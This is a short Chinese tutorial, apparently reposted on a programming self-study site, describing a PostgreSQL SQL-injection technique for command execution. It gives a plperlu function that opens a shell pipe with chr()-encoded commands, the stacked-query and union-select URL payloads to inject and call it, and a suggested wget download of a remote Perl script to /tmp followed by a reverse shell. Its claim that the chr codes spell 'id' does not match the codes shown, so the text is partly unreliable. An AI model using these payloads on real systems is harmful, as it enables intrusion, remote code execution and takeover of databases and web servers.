postgresql"初级"注入方法 - 网站安全 - 自学

CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;

select id();

id()为创建函数名，可以自定义随便写

chr(108).chr(105)是需要执行的命令id的asc编码

自己把需要执行的命令换成chr替换就行了,具体就是wget http://les.la/c.pl -O /tmp/c.pl

删除函数为drop function id(); 然后再执行此反弹shell的命令

此大法可对付一切8.0以上的版本(含8.0)

以下为实际注入时的表现形式

xxx.php?id=10;CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;--

xxx.php?id=10 and 1=2 union select null,null,null,id(),null,null,null,null--

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did13353

更新时间：2022-09-13 阅读：52次